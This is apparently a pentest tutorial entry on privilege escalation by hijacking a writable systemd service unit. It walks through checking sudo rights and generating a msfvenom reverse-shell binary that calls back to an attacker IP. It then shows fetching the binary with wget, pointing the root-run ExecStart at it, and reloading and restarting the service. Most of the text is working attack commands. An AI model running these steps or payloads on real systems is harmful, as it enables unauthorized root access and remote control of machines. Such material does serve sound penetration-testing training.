Service Hijacking
Service hijacking is a privilege escalation technique that targets misconfigured or weakly protected systemd service units. When a low-privileged user is allowed to reload or restart a service that runs as root, and also controls the unit file or any executable referenced by it, arbitrary code execution as root becomes possible.
This scenario commonly arises when service unit files or the scripts they launch are world-writable, or are owned by an unprivileged user yet executed with elevated privileges. Hijacking a service means modifying either the service configuration or its executable so that the payload runs during a systemctl restart.
# Check user's permissions
$ sudo -l
User x7331 may run the following commands on kali:
(ALL) NOPASSWD: /bin/systemctl restart backup.service
(ALL) NOPASSWD: /bin/systemctl daemon-reload
(ALL) !/bin/bash, !/bin/sh, !/bin/su, !/usr/bin/sudo
# Check the service's status and the service file path
$ systemctl status backup.service
○ backup.service - Backup Service
Loaded: loaded (/etc/systemd/system/backup.service; enabled; preset: enabled)
Active: inactive (dead)
# Check the service file's permissions
$ ls -la /etc/systemd/system/backup.service
-rw-rw-r-- 1 x7331 x7331 193 Apr 14 17:53 /etc/systemd/system/backup.service
# Review the contents of the file
$ cat /etc/systemd/system/backup.service
[Unit]
Description=Backup Service
<SNIP>
[Service]
Type=simple
ExecStart=/usr/local/bin/backup.sh # This is not writable
User=root
Group=root
<SNIP>
# Create a reverse shell payload targeting 64-bit Linux on the attacking host
$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.45.170 LPORT=80 -f elf -o revshell.elf
# Download the payload to the target machine
$ wget http://192.168.45.170/revshell.elf
# Make the payload executable
$ chmod +x revshell.elf
# Modify the service unit with malicious ExecStart
$ cat /etc/systemd/system/backup.service
<SNIP>
[Service]
Type=simple
#ExecStart=/usr/local/bin/backup.sh
ExecStart=/home/x7331/revshell.elf
User=root
Group=root
<SNIP>
# Reload systemd configuration to apply the changes
$ sudo /bin/systemctl daemon-reload
# Restart the modified service, which now runs the reverse shell payload
$ sudo /bin/systemctl restart backup.service